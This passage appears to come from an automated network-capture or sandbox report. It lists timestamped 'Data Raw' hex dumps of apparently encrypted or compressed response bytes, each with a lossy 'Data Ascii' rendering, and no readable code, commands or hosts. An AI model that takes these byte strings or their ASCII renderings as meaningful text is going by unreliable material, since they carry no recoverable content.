                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC521INData Raw: d1 27 39 6f f9 98 b5 b9 73 be e2 9e 0e 2c 84 ea 04 59 f2 34 c0 06 a0 60 65 0f c1 3e f1 18 5b a4 0b d5 80 2e 3e d3 ec 20 af 42 b9 a3 b9 2b fd 92 c1 1f 42 1d 40 44 0f 06 9e 61 5a 6b 7f cc 96 70 ae f5 12 63 e8 50 0e a5 00 7f 9e 87 53 25 90 53 1c 42 28 a7 8f 67 ba ff 81 2f 63 97 a2 a1 0a bd 6c 09 05 7b 25 b5 79 b3 b9 61 28 6e 34 f4 d5 61 e1 c5 b4 6c 88 4a 1b 0e 6d 23 0d e6 d1 1a c1 1d 4e 1f 10 0b b7 20 09 e0 3e 20 3f 59 e9 0d 7d 31 b2 c6 97 41 20 bf 13 2e 21 47 a9 b8 61 af 69 d8 c8 1b ec a8 f9 3f 98 bd 66 3a 8f f6 b6 34 db 36 3a 8e bc fd b6 3c 73 05 65 d9 69 4a 04 7c a7 36 22 36 ba 14 51 fe 7f a1 6c 06 64 26 a3 5e 1f 00 53 a3 a3 05 a8 ed 52 2b e4 52 ed 1f 2b 44 59 96 6d 87 03 cd dc 6b 37 03 d4 03 da 65 88 44 f3 c1 0a a5 74 e6 49 90 c3 06 e8 59 11 6e ab 93 26
                                                                                                                                                                                                                                                                Data Ascii: '9os,Y4`e>[.> B+B@DaZkpcPS%SB(g/cl{%ya(n4alJm#N > ?Y}1A .!Gai?f:46:<seiJ|6"6Qld&^SR+R+DYmk7eDtIYn&
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC537INData Raw: eb 70 09 01 72 41 a9 0e 29 14 e2 dd 2b d6 33 68 c2 ba d9 08 75 e6 a6 21 3f 16 fe 34 36 25 8f c6 15 20 f8 e1 7e 7a 71 e1 30 75 f7 ca 94 83 31 44 5b 84 f3 ac 16 64 e4 0f 46 ee d3 9b 9c 39 cd 61 08 dd 55 2d c5 3f f6 ca 3d 14 7b 65 a7 19 c9 f1 62 a1 dd 1d c1 17 c5 31 89 c1 23 76 54 3f d2 31 82 c5 34 70 98 46 d0 7a 6a 65 3c a5 f2 65 1c d1 a0 24 85 f9 7c f0 88 66 64 f8 08 ff 54 ae 36 f9 7f 30 da 8e e2 50 7e 4b 5d bd d1 bc 27 52 fd 24 d0 00 dd e6 5b a1 e6 2b dd d4 18 95 84 77 35 47 55 13 64 d1 ff fa 0c aa 55 90 fa 35 28 d7 a3 ab 28 84 7b c2 78 a6 85 31 88 6d 93 3c 30 33 74 37 be d3 0c 96 b0 60 28 9a 42 a9 82 e7 c7 4f 7a 49 57 3b a8 10 27 67 71 88 96 75 31 27 e7 a3 a5 8e 71 ea f0 ff e8 d2 7b b4 7d 57 b4 40 31 02 82 fa 92 37 d7 5c c3 d3 1b 89 2c 56 16 61 3c fa 30
                                                                                                                                                                                                                                                                Data Ascii: prA)+3hu!?46% ~zq0u1D[dF9aU-?={eb1#vT?14pFzje<e$|fdT60P~K]'R$[+w5GUdU5(({x1m<03t7`(BOzIW;'gqu1'q{}W@17\,Va<0
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC553INData Raw: 70 c8 3d 53 af 7c e6 3e 61 e7 8d 18 b2 c4 d2 8f a1 42 57 90 e6 f4 1c 1a 90 35 df f7 cb 87 58 8d bc e0 ea a5 59 3d c1 4a 02 f1 2d f6 38 05 d6 1b 6b f1 02 3d d4 24 3f 72 46 53 ef 50 2d 1e 63 11 d0 af 50 eb 92 ee 30 5f c0 66 c3 ce 2a 9d 26 55 09 a1 7b 81 c3 42 19 ab 64 8d 18 05 2d 55 07 2f 3c 05 8e 8c f3 ad 4d 82 79 2c 28 11 ab 59 53 53 e2 45 68 d2 02 60 3d be 3b b9 72 cf 42 09 b1 d9 2f c4 02 2b e0 b1 2f 4e ec 09 b1 47 70 b7 9b 65 f4 2b 1e b4 20 b3 e0 a2 e8 df c6 c9 a8 ed 49 1d 34 31 bf 56 dc 57 5b 7c 3c d6 87 6a 2c 73 9f 14 43 48 7d 83 c3 09 79 56 b6 24 43 b6 8e 8b 2e 3f ee bd 5a ed 9d 38 4c 94 17 85 7f 13 5d 49 f4 63 e4 21 2d 43 02 0c e9 45 f1 9b 9d b8 2d 73 16 95 1b b1 0b 88 41 64 27 0a 5f 23 0c 2f 61 07 52 17 2e 78 af dd 6b 19 06 ce 62 a2 9b ad 6a e6 6c
                                                                                                                                                                                                                                                                Data Ascii: p=S|>aBW5XY=J-8k=$?rFSP-cP0_f*&U{Bd-U/<My,(YSSEh`=;rB/+/NGpe+ I41VW[|<j,sCH}yV$C.?Z8L]Ic!-CE-sAd'_#/aR.xkbjl
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC569INData Raw: 94 a3 19 a2 a6 03 a7 ba 17 de 1a ee 22 51 ad 41 71 81 1c 6c 8d 1a 69 97 af 75 87 07 3d 27 c2 c2 49 8e 28 73 85 1e 2d ef 3e c6 51 53 90 b5 06 96 31 af f1 f4 72 31 da 44 5c 99 4c 99 d1 96 fc b5 0e ec 40 ba 7e 70 04 10 69 c3 dd 64 aa ba b3 b6 12 de 1c ef a8 7f 1d 26 48 03 9a 84 b9 19 b1 b3 1f 5d 0d d2 69 62 a8 68 6b 04 6d 62 d3 f7 a1 4f 88 88 b4 13 14 5a ae 1c 6c 0b e7 66 5c a4 e2 ef a8 64 ea 97 24 20 9f fd 7c a7 5f e2 82 0b a8 17 14 15 dc 2c 69 17 84 eb 73 93 f3 2c 10 19 83 de 90 8d 37 9b ee 2d cf 4e 59 95 b8 95 92 1b 81 a2 29 d5 5f b3 95 f2 8d ef 86 c6 52 b3 90 a9 0a b3 1b 8b fe dc d5 5e ba 8c bc 9c 8a 69 24 16 92 46 3e dc b9 da 47 55 93 aa 9f 97 0f bd 68 67 1b 05 15 9f e4 ab 95 2f 85 ad 30 d0 50 a9 93 e4 9e f4 90 d3 5d b0 89 97 0d 87 1f 84 e7 d9 da 40 bc
                                                                                                                                                                                                                                                                Data Ascii: "QAqliu='I(s->QS1r1D\L@~pid&H]ibhkmbOZlf\d$ |_,is,7-NY)_R^i$F>GUhg/0P]@
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC585INData Raw: 06 f3 76 98 15 6a 9a de bb 2a 8e fe 37 6f 49 e4 3e 4f 3f 66 6c e0 b7 d9 5a d0 5d d9 f9 2f bb db a2 05 a1 84 cd a2 76 9b 92 48 3d 81 6d c6 02 6c fc 71 cf 46 d2 6f fd 4d bd cd 8b be 8a 94 c2 63 1a b9 53 d3 08 1c 64 af d2 09 87 b7 8b 1d 1c 59 b6 71 b2 1c 15 32 3f c6 04 f8 ac 71 f2 6c e3 ab d8 fd 00 ca dd b0 e5 9d 2e 54 a6 39 d2 0b 6c c6 3c 38 dd 8a 02 d9 fb ab 1d 36 18 c6 a6 88 f7 ad e0 05 52 7a 9d 06 8b 3c c2 70 62 ac de f0 61 0b 2b 49 88 ce 88 d3 eb a3 5d c4 81 03 7d ec a1 3a e3 ad f1 c4 5e 62 11 95 f3 93 d2 3e 75 25 76 82 b5 ad 39 b2 a1 09 fc 9e 0a 91 01 2a 2e 4b d3 80 22 ab 8d 3b 24 82 cc cf 09 62 4e c2 77 a2 8b dc 8f 29 5c 8b dd d2 a3 0d b7 74 e0 de 1e 8d 19 ec 4f 11 94 a1 65 e9 7d 4a ef f1 3b 62 53 c3 e4 40 cc 42 d4 d2 92 56 00 03 58 ce b6 89 3e ef 14
                                                                                                                                                                                                                                                                Data Ascii: vj*7oI>O?flZ]/vH=mlqFoMcSdYq2?ql.T9l<86Rz<pba+I]}:^b>u%v9*.K";$bNw)\tOe}J;bS@BVX>
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC601INData Raw: b7 e3 ab bf 8e ad cd c1 85 91 65 7e e1 65 94 5c 41 3c b8 4e 18 8d 64 5c 33 4a 2a 7e 84 82 8c eb 15 90 b5 ef e8 2f 73 44 71 6f 06 71 4e 10 25 f4 e8 dc 9e 80 fa 90 b0 0f 8e bc bc 6a f0 4c 97 ee e1 8e b6 62 f6 85 94 b0 67 fb bd 7b 36 d0 05 5b 19 e9 a2 91 87 6f a0 3a 88 9f 57 1a 4e 10 c4 f6 a8 6b ff de 04 e4 07 c6 75 b3 89 e0 4e 78 35 64 f2 74 f2 3d f6 62 e1 a5 e3 e5 73 60 4f 62 8f 2c 76 d9 c9 b6 49 94 27 ec fe 75 63 02 51 51 01 7f ac 4b e1 10 10 e0 c1 94 6b b1 d8 1e 9d a3 ae db 9f 6a 94 ea 2e a0 48 65 49 e2 d4 b6 17 d7 fb 22 81 4f 48 a6 fc 15 06 57 23 93 0d 29 30 be 60 89 06 a3 79 91 c4 ed 7e 6c 92 24 37 3d 06 31 7f da c4 c0 c6 23 39 e9 47 2b fa d6 99 f1 56 e0 7a 7b 2f 44 dc 0b 88 65 8e 58 e6 2f 61 1a 7a 03 5c 12 f6 79 a7 ae 39 1d 65 9d 11 a7 d0 d6 37 a8 56
                                                                                                                                                                                                                                                                Data Ascii: e~e\A<Nd\3J*~/sDqoqN%jLbg{6[o:WNkuNx5dt=bs`Ob,vI'ucQQKkj.HeI"OHW#)0`y~l$7=1#9G+Vz{/DeX/az\y9e7V
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC617INData Raw: f9 6b f1 8a dd 17 d4 9b 08 d8 b6 fd 7a 0b c3 26 90 e2 82 7e d1 c9 72 ad 4e c4 3d 6d d3 9e e6 ca 3e f6 62 95 40 80 93 bf 77 04 31 11 85 80 12 0d 39 5c cd ff e7 38 2d 03 06 1f 87 b0 c8 62 15 0d be fb 0d 8b 3f 8f 0a 05 81 40 e8 f7 38 fa 4f 4f 2d b6 a6 d3 dc b0 3f 93 8d 7d 89 02 60 37 d6 b2 9c 38 1c 69 ac a7 f0 2a e0 1f 21 48 88 b1 cb 24 5d de de a8 c0 bd bb 2a a7 5c 3d f1 92 cc 88 ca 23 d8 9c f4 16 17 89 4e 86 42 c8 d0 99 f1 ed 60 62 25 38 2b 6f e0 36 cf 4e 52 a2 e3 88 11 d4 b7 34 06 ef 14 46 4c 54 c7 56 da 9f 4a d8 9c 4c ff f2 f3 bf 07 b7 c7 45 36 ae e5 ce 0a 73 2d ae 77 8f 4e e0 3d 86 d7 92 5c 45 47 71 42 7c dc c2 d8 17 6f 6f e5 3a 3d 06 c0 21 2d 76 87 b9 f5 d8 4b 1f 0b 70 46 0f 8d 2d 78 50 47 a9 93 bf 77 ab 16 eb be b9 df d5 8d e8 d6 13 55 0f 8a eb e3 3e
                                                                                                                                                                                                                                                                Data Ascii: kz&~rN=m>b@w19\8-b?@8OO-?}`78i*!H$]*\=#NB`b%8+o6NR4FLTVJLE6s-wN=\EGqB|oo:=!-vKpF-xPGwU>
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC633INData Raw: 0f e7 6a f8 b5 ab d4 ca b1 89 0d a0 c0 f8 16 68 58 ed ee 5b 0f b3 ca 03 21 4e 27 ca 5d 2d 45 94 ce 10 5b cf 0e 67 b9 f2 d3 70 8a 6b c4 0b 65 02 f9 a5 84 4d 20 42 13 41 d3 51 4f 22 30 4e 1c 07 b0 7e e4 53 47 20 88 44 bc 16 7d 66 58 76 61 cc af 0b 09 d2 a4 ad ee ee f9 92 c2 df 27 3f 90 ff 13 f7 d1 77 4a 97 b0 7f 29 42 ef 71 de a4 36 38 6b 90 fa f9 45 d7 2d f5 88 4f d6 46 c0 76 6a 77 d4 ba f1 98 b3 16 2c 97 a5 d5 8a fd ba 6a ff 01 55 dc f1 16 43 13 d3 d8 b5 a0 e0 a1 3f 59 3c 7d e7 3b b8 a2 ed 9d a5 88 5c 1a 9c 1e 8e b7 7c 87 69 b1 30 e9 23 cc 24 75 1f 78 9a 60 34 c9 32 58 c1 f7 5e 4a b8 d4 fc 89 ab c1 2e 49 fd a1 4a fc 5d 71 ef d5 83 2e e3 2e 10 f8 68 23 96 7b d1 5e 6f 39 8a 64 94 d3 07 70 0f bf a2 c9 80 d3 b0 4b 3e 20 ec 7b fb 9d 8c 4a 53 65 db a6 e0 9d 4f
                                                                                                                                                                                                                                                                Data Ascii: jhX[!N']-E[gpkeM BAQO"0N~SG D}fXva'?wJ)Bq68kE-OFvjw,jUC?Y<};\|i0#$ux`42X^J.IJ]q..h#{^o9dpK> {JSeO
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC649INData Raw: 77 40 5c 61 a6 54 da ca e7 dd c1 62 f2 b7 fb fa ce fe 7c 4c 5d 97 86 1e 48 1c 3a 0c f2 2e dc 2a 76 53 7c a0 fe 48 d0 5c 97 fa bd a3 83 99 69 ed 56 5e c3 5d 0e f9 08 01 7c ea d0 90 b1 5f be 23 27 c7 7a 19 5d 9e 6d 84 4a e1 ad 56 71 fe 17 d9 2d 8f 2d cb 7a d7 1e a4 01 70 82 67 40 1e 27 b4 72 41 92 23 47 c0 f9 9b d9 0a 67 96 e2 a1 5b 5d ff 34 c5 b1 bb 16 0d a9 59 52 a6 17 45 66 aa 5e 15 40 f1 db e1 47 3b c8 1d 02 21 e3 c2 0a 69 64 95 9c 70 e0 43 97 69 d8 a7 b2 19 37 2d 59 16 aa 76 97 88 3a e2 fd 3b cb 24 e8 56 b2 7e 80 45 04 5c 59 3c 5e 5f 48 36 d9 67 25 39 20 d8 39 2d 61 79 13 ef d8 72 19 36 13 53 4d db 67 cb 82 8f 4c e6 59 d9 80 e3 6c da 0e 6b 4e ac 06 2f 1f 22 fb d8 17 d4 a2 60 f0 ac 6a 70 7d 78 a7 61 57 66 73 2b 72 6a 62 d6 dd 4a 85 ac 8a 8f 64 c1 69 b6
                                                                                                                                                                                                                                                                Data Ascii: w@\aTb|L]H:.*vS|H\iV^]|_#'z]mJVq--zpg@'rA#Gg[]4YREf^@G;!idpCi7-Yv:;$V~E\Y<^_H6g%9 9-ayr6SMgLYlkN/"`jp}xaWfs+rjbJdi
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC665INData Raw: 14 67 d8 cb 03 03 44 02 88 01 2e 52 ef a6 7c 8c 4b 22 0a b7 55 ca 0c 98 a7 74 42 c7 f1 2a fc 0a c8 d4 5a df 3b ab 81 58 82 81 73 82 3a d9 78 bd 35 e5 5f 57 4a f7 d3 b6 bf c8 f5 e3 9a 20 4c 5c 19 9f 23 85 0e f9 64 0c 8c 7d 5b 1b 5f 56 37 dd 26 a0 79 8d 2d ad e7 06 e5 e3 7e 96 bf 9e dc ef 6c c7 8d ec 73 27 2c c2 cb c0 6f fd 54 7c b4 95 a4 5e be 13 e8 8f d1 a4 8c df a5 28 2c 6c 25 24 8c 7e a9 a1 b7 b4 ab db 1c 79 38 14 1b 01 53 14 37 30 3e 44 bb c2 1b 3d 9b 22 96 88 ef c4 79 c1 0e 02 c9 b3 b6 f0 4e 8f 1a 44 c9 ac f2 7b dc 86 d0 28 d4 95 3b 1d 20 4f aa e9 20 30 ef e1 90 bb 5a 8e 5f f7 07 9c 43 9d bb 46 c3 50 90 27 21 24 12 a8 e9 57 24 5f 03 8c ee 15 2a ca a2 79 ce 81 03 a8 5e 64 22 06 f9 6f 98 9c dc ae 25 d1 25 ff fe 93 2d 15 9e 39 da 3e ae de e7 d4 8c 1b b9
                                                                                                                                                                                                                                                                Data Ascii: gD.R|K"UtB*Z;Xs:x5_WJ L\#d}[_V7&y-~ls',oT|^(,l%$~y8S70>D="yND{(; O 0Z_CFP'!$W$_*y^d"o%%-9>
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC681INData Raw: fb ef 1a f2 fa 4f 54 60 c7 ba 54 f9 92 30 c4 8d 67 fa 91 7c bf 9f fe ff 6c 7c 86 47 6c de b1 5e 6e 17 29 47 57 5a 84 b9 e3 28 81 d3 5c cd 58 1f 88 32 71 f5 32 c1 45 3b a8 61 5a 3d 24 8d e0 09 16 db e9 7c 55 20 3f c8 32 45 53 fd 61 0c 10 4e 42 5a e4 fd d2 b6 75 13 65 21 66 48 c3 5b 4d 79 d0 66 97 87 b8 02 bc b9 6a e9 5a aa c6 48 f0 2c d5 fb 22 13 b3 cb bb ac 11 dc c9 4e 19 f6 2d f5 bf b5 76 fb 48 16 b3 db fd d9 e4 6c c2 58 6b c9 f8 f1 80 85 d6 05 fa 3b 2e e0 a3 cd 61 31 96 be c8 87 35 4a f9 f3 dc 19 f0 a9 35 fa 9a 22 3c 4d 5d 06 72 00 05 99 9d 71 45 25 ab 7c 1c 0d e2 2b a0 92 67 f6 ff 8c b7 22 78 1a 7f 56 4b 61 e8 1f b8 89 d5 c2 24 89 7f 50 67 e2 cc b9 16 d8 5b b5 7e 41 17 b2 cb 47 32 16 b0 ad 41 02 d4 f8 86 e1 59 64 43 88 7c fd 5c 04 11 d6 80 ee ea fb 6d
                                                                                                                                                                                                                                                                Data Ascii: OT`T0g|l|Gl^n)GWZ(\X2q2E;aZ=$|U ?2ESaNBZue!fH[MyfjZH,"N-vHlXk;.a15J5"<M]rqE%|+g"xVKa$Pg[~AG2AYdC|\m
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC697INData Raw: 27 e3 bd 3f 21 0f e1 9e f2 44 6a 17 07 9e ad 72 23 43 82 f7 f0 41 ae 89 b1 ef c0 77 13 90 41 78 e4 56 fa 83 5d 9d 37 c5 81 cf af 97 08 c7 ea e0 49 f7 ca 26 b0 fb 0c 02 b6 dc 6c f1 d3 3f e8 22 51 1f 7c 7a bd 9c a5 39 73 3e 2b 35 8d 1a 14 b2 4c cc b4 61 5a 0a 27 ea 8a e6 12 f0 97 22 88 12 92 49 b8 c5 fd 2b 1b 50 e3 44 15 b9 18 64 e5 1f 1c dc 5d ff 08 c3 d5 13 04 28 10 1b d8 9e e3 91 f0 b4 67 df a0 f0 14 24 fe 91 5d fb 8d 88 ed dd 1b 99 9a 28 ef 44 ba d0 bd 43 88 c7 24 72 13 a2 c6 fa 2b 35 61 5d ff c8 9b 8d e3 6a 9d 88 07 af 4c d6 c1 3c c9 97 b8 fd 0f 71 3e f9 d4 96 98 57 34 15 1b 79 ba ba 8a be d3 ab bb 93 d5 2f 25 6d 6d 03 d9 a8 4c d9 48 92 70 28 6d e7 5a b1 34 59 80 8d 99 97 6a 1a 3c 03 2d c1 87 f5 3a b5 26 d3 14 87 64 c0 3f cf 01 3e db b3 01 61 ca 36 51
                                                                                                                                                                                                                                                                Data Ascii: '?!Djr#CAwAxV]7I&l?"Q|z9s>+5LaZ'"I+PDd](g$](DC$r+5a]jL<q>W4y/%mmLHp(mZ4Yj<-:&d?>a6Q
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC713INData Raw: d8 8f 15 53 5b 0f 76 50 b8 ca 9e 00 68 c6 04 26 2c 8a 97 9d e7 12 2a 9e 75 57 cb 81 4a fd 9b b9 17 24 42 f3 41 ce 0d bd 26 29 00 33 a5 84 77 ae 63 67 a8 bd ff e4 97 df 3c 3d 76 77 cf ea c4 1c 90 ec 63 f9 df 4d 00 9c 1c 25 11 1f f4 0f 2d 2a 4a e2 d8 97 e9 4c 48 01 07 b0 f3 1f 86 49 94 71 a7 e6 5e 82 3f d9 c8 e6 25 87 44 58 76 23 b2 f1 e8 ca 98 61 a5 25 1e ee 8c 3c 9d 71 78 1a c6 0e 87 8b 0e 8d 69 86 e6 41 e9 b3 44 93 36 54 f0 89 85 96 a3 15 bf ab a4 1e 95 9a 35 8e ec e8 fd 44 88 21 50 ac d6 d9 25 4f 80 a4 4a 91 58 18 81 d1 26 62 71 0e ac 7e 4b fa 4c 77 4b b4 37 4f 5a c8 01 40 1b 90 b7 d8 87 29 76 6a bb 87 67 00 81 55 76 9f e6 52 2d 15 94 2f 30 a3 40 d1 a6 9b 7f 3a b5 68 58 f9 e7 ed b1 71 4b 59 fe cb ca 79 2f 05 e9 a6 c7 50 ec 81 6d b5 2c e2 9b 54 e1 96 cc
                                                                                                                                                                                                                                                                Data Ascii: S[vPh&,*uWJ$BA&)3wcg<=vwcM%-*JLHIq^?%DXv#a%<qxiAD6T5D!P%OJX&bq~KLwK7OZ@)vjgUvR-/0@:hXqKYy/Pm,T
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC729INData Raw: c6 10 22 b6 63 d8 9c 6f 15 98 d7 ff 58 65 36 aa 6b b7 a0 19 28 17 19 63 ab ad 99 33 c2 48 69 db a1 8c c9 a7 6b 60 98 64 43 37 ad 07 9f 78 3f e0 4d c0 08 91 99 79 d0 54 59 1b 14 f3 6c 31 58 b2 17 54 93 58 d4 6a fb b8 03 c6 fc e7 78 7a c1 10 c6 01 fb 79 50 ab 50 ae 2b f5 1c b1 a7 fa f1 05 e8 3f 27 28 2d f5 6c 48 f3 41 4c f7 f5 45 89 b9 86 45 d7 41 14 db 89 40 a6 b7 a3 b1 6e 1d 74 e7 51 3b d7 49 74 45 82 a2 85 08 1a 6c 66 e4 6c f0 7c ad e3 14 66 1b 88 ea 8c 69 94 64 ca a0 6d 17 bf 30 2f 8c 40 df c2 f7 f7 31 8c 3e a1 f5 f6 a2 d7 8c 80 0c 9e 41 49 5e 70 9c 42 01 03 cd 96 14 77 d1 79 6a 2c 25 ac 3b 51 df b0 c6 fc f2 47 36 d9 67 1a 1a 07 4a 6f c1 2a 79 da 84 b5 c7 16 1a 47 b3 40 a3 cc b4 c7 b4 f5 52 95 d9 86 ae a7 31 ad af 65 e5 54 39 1b 00 49 57 0f ff 4f 8b d8
                                                                                                                                                                                                                                                                Data Ascii: "coXe6k(c3Hik`dC7x?MyTYl1XTXjxzyPP+?'(-lHALEEA@ntQ;ItElfl|fidm0/@1>AI^pBwyj,%;QG6gJo*yG@R1eT9IWO
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC745INData Raw: 81 93 1a 86 89 c3 bc 94 e8 75 98 67 1d b8 9c 22 2a 59 0e 06 a0 cf 01 83 7a 94 10 b1 5d 9a 78 61 be 3e 08 f0 61 2c 33 48 7a 27 73 e9 6a 59 28 70 c4 61 70 e2 77 62 2a 0e e5 70 1b 37 1c 80 d0 01 15 cf e2 e6 d7 59 e7 ad 0a 30 ea f6 9f e9 08 7b 82 ee a2 c9 8b e8 6f ee ca 46 22 bc 4f 56 6d 3c a8 e5 e5 95 cb f3 9d e8 14 65 16 d0 4d 93 a4 51 ac 6f 1b 54 bc b2 d9 d6 8d b4 f0 4f da ee ff f7 8f 13 69 71 6c 35 cc bd e2 0f 23 16 66 85 43 74 96 a4 9c 89 28 9f 15 a1 27 3d 36 62 13 e8 f8 8a 32 58 1f 97 3e 7b 89 e5 0d 92 24 14 9b 74 7d 93 9d 47 97 7e 87 8f 96 cf b7 ff 0d 64 14 5f a3 ab e5 ca 8e b9 19 33 4b 90 76 0d 8a 58 5f 97 66 51 a3 62 a9 6d b0 73 99 50 f7 90 7c bf 95 a0 cd ab b8 90 58 09 9e 72 ae af 19 24 ad 2b fe 1f 9d e2 67 94 6c 11 9c 83 fd 9a 68 87 b0 19 15 92 78
                                                                                                                                                                                                                                                                Data Ascii: ug"*Yz]xa>a,3Hz'sjY(papwb*p7Y0{oF"OVm<eMQoTOiql5#fCt('=6b2X>{$t}G~d_3KvX_fQbmsP|Xr$+glhx
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC761INData Raw: 67 a7 5c 1b 44 f2 0e 1f c3 ac 36 8f f9 85 e0 e5 a0 84 f0 c6 06 1f a4 1c 8a 0d 6d ff 18 97 6a 15 79 a9 3f 82 8d 83 90 5f 75 74 03 94 bf 49 9c 90 0f 50 28 61 fe b0 4e cf 10 c8 81 86 d4 e6 e0 bc 6d 9f 1f 1d c8 ec d5 6e 0f 86 ed c6 8c c9 8e 43 d1 e1 10 5b 66 d3 e7 62 51 36 80 12 ad fc 58 1d c9 f8 16 53 ea 52 df 2b f5 d5 16 1f 44 e2 b7 99 45 b5 2d a0 25 c4 6f 00 c8 a3 4b 62 3d f5 e5 b7 99 6f ee 27 5f 14 fd 91 c8 9b 50 34 b0 07 b7 cf b1 93 28 90 12 dc 4d 4f f6 30 07 0a 6d 12 7a 0f c5 ac e4 60 4d 66 90 81 5c bf 6f 01 48 92 06 d4 d5 a5 8b f4 cd 63 62 be 79 12 51 2a f9 92 a2 ed e9 92 54 63 48 02 2e e3 74 08 a3 4d 25 a8 67 08 e2 a1 20 35 6f 98 65 84 14 fe f0 99 c6 46 79 d3 c2 c6 91 40 1f de d9 a6 b4 1d 36 fb 21 23 f4 4d cc c2 4c 4c 06 08 e6 59 6c ba e1 79 cd 88 f7
                                                                                                                                                                                                                                                                Data Ascii: g\D6mjy?_utIP(aNmnC[fbQ6XSR+DE-%oKb=o'_P4(MO0mz`Mf\oHcbyQ*TcH.tM%g 5oeFy@6!#MLLYly
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC777INData Raw: c0 50 84 49 a9 04 44 c1 46 d8 5a 8d 14 c5 e7 27 48 f8 a4 0e e3 3e d2 fe 61 0b 12 8a 9b a0 3f 9e f1 b7 f0 1a bc 31 f0 6a d9 b0 4d a6 72 66 00 17 2c 31 ee c6 83 a3 c9 0f 3b d7 53 06 74 15 cf 65 80 5e fd f6 78 e2 90 10 1b 98 2b 8c 8a a7 e1 f6 6c 5f 54 02 82 e7 75 b1 d0 bb 43 08 ef b5 bf 61 29 3b 71 a5 62 c8 91 4a 3d de a6 e8 3d 1b 00 67 fb 5b 74 69 7e 20 5c 53 d1 f4 0c 81 42 84 a2 c7 4a df 01 86 37 40 fc c4 91 e0 80 38 e4 35 ff 49 b3 f7 76 eb 49 64 fb 57 5c a4 a3 fc 98 8d 23 70 d9 84 c9 19 7f eb 83 75 20 5d 19 1f f0 4f e9 ca f6 c0 02 61 38 ac 11 93 2c a2 d2 60 4f 6a 21 fe 56 c2 61 d6 3a c2 70 8b 90 3a 1c 5f 8c 25 00 15 8f 9a 40 cf ca bb b9 27 6a 83 4f f8 50 d9 2e 30 5b 53 80 24 bd d9 dc b8 59 39 5d a5 c5 8d 2d 69 80 3b df d6 7f 28 37 29 79 ea 85 a3 f7 fb 94
                                                                                                                                                                                                                                                                Data Ascii: PIDFZ'H>a?1jMrf,1;Ste^x+l_TuCa);qbJ==g[ti~ \SBJ7@85IvIdW\#pu ]Oa8,`Oj!Va:p:_%@'jOP.0[S$Y9]-i;(7)y
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC793INData Raw: ef c6 06 8a ee bb 2a 9a 17 f8 e8 64 ab 68 c8 0c c9 2e 42 ea 8d bf e0 aa 29 05 d5 5d 1a dd d4 df bf 95 f3 b9 52 d5 0c 5e d4 38 32 38 24 28 97 e3 60 d9 c8 7f b7 75 ee 73 0e 44 6f a2 47 0f db 48 4d 77 60 83 09 c7 41 4b 60 db 2b 45 08 de 60 cd 32 fc 78 8c ce 51 ac 51 0c 93 65 5a b0 20 68 f8 72 cd fe 33 fa 8a 25 99 fa af 22 ca 19 92 d0 be ff 3e 24 1e 82 c5 9e f3 a6 01 ef 43 46 02 2a 81 7f 26 79 a6 88 79 b4 9e 23 c8 c9 cc 8a 59 f1 36 75 de da 28 03 95 b9 07 af 06 db a0 67 90 eb 23 c1 87 82 9e 45 5b 90 c3 aa b7 27 31 c3 bb 1b a6 56 d7 08 db eb ac 21 de a2 03 e7 c3 d7 f8 5c 9b dc 42 e0 40 ba ec aa b6 2e 62 db da 51 83 68 2e 86 8b ba 30 d4 ac 4f cf 7c 06 75 81 3b 51 d0 c6 7c 88 b0 77 77 0c cb b3 f2 9b c2 41 a8 3d 0d fb e3 2a 47 58 18 92 46 1b 7d 95 7e 44 86 ac 0d
                                                                                                                                                                                                                                                                Data Ascii: *dh.B)]R^828$(`usDoGHMw`AK`+E`2xQQeZ hr3%">$CF*&yy#Y6u(g#E['1V!\B@.bQh.0O|u;Q|wwA=*GXF}~D
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC809INData Raw: 17 b6 ff 45 28 33 b0 4f 20 30 12 ea 05 25 9b 68 87 30 06 58 86 03 46 20 95 b1 a8 20 96 c2 05 18 b2 e6 00 15 1e 6c 93 76 13 12 ac e0 c2 74 2b 51 c7 dd a1 ad b3 db 14 a4 6b 41 2a d3 59 7a 0c e6 57 93 b3 bb 4a a4 76 1d 64 ff 9c 8f 5e 35 ec c2 78 ed 73 b4 10 4f 41 5f e9 58 40 bc bd 3f ea cb 5b a8 8c 24 96 7c 40 81 92 8a c2 41 af db b3 c7 dd 99 2c 21 3c 01 a0 d1 72 e5 30 51 ba a3 e0 e2 1e 2f 70 26 ef 6f bc b0 c0 da b8 cc e8 f9 de 33 2e 1e ec 91 90 0e c1 9f 48 34 14 29 8a eb 25 80 db fe 3a ed 4f 92 c3 f2 a0 43 bc 86 4e aa 0b 51 ab 7d 97 1d b8 7b 6c 30 50 e4 9c 51 f0 c2 68 90 a7 c3 86 78 b9 c5 e6 1a 71 d7 cb 3e 57 34 a2 65 df 03 e1 b5 7f 6e 1f 06 dc b9 79 f9 2f 9b 71 bc 8a 55 1b 91 3b 0f 28 4a 26 a4 5f 91 13 4f 40 16 c3 91 4c 90 6d bc 55 ee 05 33 fc ad 69 0e ec
                                                                                                                                                                                                                                                                Data Ascii: E(3O 0%h0XF lvt+QkA*YzWJvd^5xsOA_X@?[$|@A,!<r0Q/p&o3.H4)%:OCNQ}{l0PQhxq>W4eny/qU;(J&_O@LmU3i
